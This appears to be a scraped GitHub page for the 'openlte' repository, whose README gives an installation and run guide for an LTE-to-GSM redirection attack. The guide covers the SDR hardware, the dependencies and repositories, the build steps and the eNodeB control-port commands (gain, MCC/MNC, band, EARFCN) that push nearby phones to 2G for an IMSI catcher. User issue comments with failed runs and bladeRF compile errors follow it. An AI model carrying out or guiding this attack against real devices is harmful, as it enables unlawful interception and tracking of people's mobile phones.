bbaranoff / openlte Goto Github PK
View Code? Open in Web Editor NEWLicense: GNU Affero General Public License v3.0
License: GNU Affero General Public License v3.0
LTE Redirection Attack Updated with https://github.com/bbaranoff/openlte2GSM Easy install tested on ubuntu 20.04.3 and against Android 11 Posted on 1 December 2019 by bastienbaranoff Category:Mobiles Networks Hacking Leave a comment Edit This Redirect attack from long term evolution (LTE 4G) to global system mobile (GSM 2G): article in progress Install From Scratch: Tested with : LimeSDR-Mini + 2 Motorola (C1XX series osmocom-bb compatibles) or BladeRF-xA4 + 2 Motorola or BladeRF-xA4 + LimeSDR-Mini Kali Linux 2019.4 (Gnome AMD64) (Docker) Install the dependencies : apt update apt upgrade apt install build-essential libgmp-dev libx11-6 libx11-dev flex libncurses5 libncurses5-dev libncursesw6 libpcsclite-dev zlib1g-dev libmpfr6 libmpc3 lemon aptitude libtinfo-dev libtool shtool autoconf git-core pkg-config make libmpfr-dev libmpc-dev libtalloc-dev libfftw3-dev libgnutls28-dev libssl1.0-dev libtool-bin libxml2-dev sofia-sip-bin libsofia-sip-ua-dev sofia-sip-bin libncursesw5-dev bison libgmp3-dev alsa-oss asn1c libdbd-sqlite3 libboost-all-dev libusb-1.0-0-dev python-mako python3-mako doxygen python-docutils cmake build-essential g++ libpython-dev python-numpy python3-numpy swig libsqlite3-dev libi2c-dev libwxgtk3.0-gtk3-dev freeglut3-dev composer phpunit python3-pip python-pip pip install requests pip3 install requests 4G Redirect Clone or download the necessary repositories : git clone https://github.com/ettusresearch/uhd tested with checkout dbaf4132f git clone https://github.com/pothosware/SoapySDR tested with checkout 67abec9 git clone https://github.com/nuand/BladeRF (necessary even if you don’t have a blade) tested with checkout f03d8433 git clone https://github.com/pothosware/SoapyBladeRF (only if you have a BladeRF) tested with checkout 1c1e8aa git clone https://github.com/pothosware/SoapyUHD tested with checkout 7371e68 git clone https://github.com/myriadrf/LimeSuite only if you have a LimeSDR) tested with checkout a5b3a10f git clone https://github.com/gnuradio/gnuradio tested with checkout 8e2808513 git clone https://github.com/osmocom/gr-osmosdr tested with checkout 4d83c60 wget https://tls.mbed.org/download/polarssl-1.3.7-gpl.tgz && tar zxvf polarssl-1.3.7-gpl.tgz git clone https://github.com/bbaranoff/openlte tested with checkout 4bd673b Compilation (same order for the compilation than from the git clone(s) or download) cd dir_to_compile (git submodule init && git submodule update) -> only for gnuradio (cd host) -> only for uhd mkdir build cd build cmake .. make -j$nproc make install ldconfig Then build 2G IMSI-Catcher Build IMSI-catcher Running Phone in 2G/3G/4G mode This article is in progress and is just a PoC The attack step are run the IMSI-catcher into arfcn 514 follow (see Build IMSI-catcher) run the 4G redirector as follow Shell #1 LTE_fdd_enodeb Shell #2 telnet localhost 30000 write rx_gain 30 write tx_gain 80 write mcc 215 write mnc 15 write band 7 write dl_earfcn 3350 (change with your ue values be careful that the earfcn is in the band) Then switch the phone in airplane mode and in localhost:30000 (Shell #2) start wait… and when you have “ok” answer in shell #2 remove airplane mode and … enjoy ! see https://pl4y.store/index.php/2019/12/01/lte-redirection-attack/
please Introduction more about the workflow of redriection the phone from LTE to GSM,I read the code in LTE_fdd_enb_mme.cc,not found the related content ,is there need to additional programming?thanks!
When I use bladerf for LTE redirection, it is displayed in shell2 as follows:
telnet localhost 30000
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
*** LTE FDD ENB ***
Type help to see a list of commands
rx_ gain 30
fail "invalid command"
write rx_ gain 30
ok
write tx_ gain 80
ok
write mcc 460
ok
write mnc 00
ok
write band 40
ok
write dl_ earfcn 38950
ok
start
fail "cant start"
Displayed in shell1:
LTE_ fdd_ enodeb
*** LTE FDD ENB ***
Please connect to control port 30000
[INFO] [UHD] linux; GNU C++ version 9.3.0; Boost_ 107100; UHD_ 3.15.0. HEAD-0-gdbaf4132
[INFO @ host/libraries/libbladeRF/src/helpers/version.c:79] Firmware version (v2.4.0) is newer than entries in libbladeRF's compatibility table. Please update libbladeRF if problems arise.
[INFO @ host/libraries/libbladeRF/src/helpers/version.c:103] FPGA version (v0.14.0) is newer than entries in libbladeRF's compatibility table. Please update libbladeRF if problems arise.
I wonder if it's the bladerf problem? The bladerf version is as follows:
bladeRF> version
bladeRF-cli version: 1.8.0-git-f03d8433
libbladeRF version: 2.2.1-git-f03d8433
Firmware version: 2.4.0-git-a3d5c55f
FPGA version: 0.14.0 (configured from SPI flash)
[ 83%] Building CXX object LTE_fdd_dl_file_scan/CMakeFiles/_LTE_fdd_dl_fs.dir/src/LTE_fdd_dl_fsPYTHON_wrap.cxx.o
LTE_fdd_enb_radio.cc: In member function ‘LTE_FDD_ENB_ERROR_ENUM LTE_fdd_enb_radio_bladerf::setup(uint32, double, int16, int16, uint8, uint32, uint32)’:
LTE_fdd_enb_radio.cc:830:52: error: invalid conversion from ‘int’ to ‘bladerf_channel_layout’ [-fpermissive]
In file included from /home/enha/apps/lteAttack/LTE_fdd_enodeb/hdr/LTE_fdd_enb_radio.h:56:0,
from LTE_fdd_enb_radio.cc:63:
/usr/local/include/libbladeRF.h:2577:15: note: initializing argument 2 of ‘int bladerf_sync_config(bladerf*, bladerf_channel_layout, bladerf_format, unsigned int, unsigned int, unsigned int, unsigned int)’
int CALL_CONV bladerf_sync_config(struct bladerf dev,
^
LTE_fdd_enb_radio.cc:850:52: error: invalid conversion from ‘int’ to ‘bladerf_channel_layout’ [-fpermissive]
In file included from /home/enha/apps/lteAttack/LTE_fdd_enodeb/hdr/LTE_fdd_enb_radio.h:56:0,
from LTE_fdd_enb_radio.cc:63:
/usr/local/include/libbladeRF.h:2577:15: note: initializing argument 2 of ‘int bladerf_sync_config(bladerf, bladerf_channel_layout, bladerf_format, unsigned int, unsigned int, unsigned int, unsigned int)’
int CALL_CONV bladerf_sync_config(struct bladerf dev,
^
LTE_fdd_enb_radio.cc: In member function ‘void LTE_fdd_enb_radio_bladerf::receive(LTE_FDD_ENB_RADIO_PARAMS_STRUCT)’:
LTE_fdd_enb_radio.cc:977:76: error: invalid conversion from ‘int’ to ‘bladerf_direction’ [-fpermissive]
In file included from /home/enha/apps/lteAttack/LTE_fdd_enodeb/hdr/LTE_fdd_enb_radio.h:56:0,
from LTE_fdd_enb_radio.cc:63:
/usr/local/include/libbladeRF.h:2503:15: note: initializing argument 2 of ‘int bladerf_get_timestamp(bladerf*, bladerf_direction, bladerf_timestamp*)’
int CALL_CONV bladerf_get_timestamp(struct bladerf *dev,
^
LTE_fdd_enodeb/CMakeFiles/LTE_fdd_enodeb.dir/build.make:302: recipe for target 'LTE_fdd_enodeb/CMakeFiles/LTE_fdd_enodeb.dir/src/LTE_fdd_enb_radio.cc.o' failed
make[2]: *** [LTE_fdd_enodeb/CMakeFiles/LTE_fdd_enodeb.dir/src/LTE_fdd_enb_radio.cc.o] Error 1
make[2]: *** 正在等待未完成的任务....
CMakeFiles/Makefile2:961: recipe for target 'LTE_fdd_enodeb/CMakeFiles/LTE_fdd_enodeb.dir/all' failed
make[1]: *** [LTE_fdd_enodeb/CMakeFiles/LTE_fdd_enodeb.dir/all] Error 2
make[1]: *** 正在等待未完成的任务....
[ 85%] Linking CXX shared module _LTE_fdd_dl_fg.so
[ 86%] Linking CXX shared module _LTE_fdd_dl_fs.so
[ 88%] Built target _LTE_fdd_dl_fg
[ 91%] Built target _LTE_fdd_dl_fs
Makefile:138: recipe for target 'all' failed
make: *** [all] Error 2
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.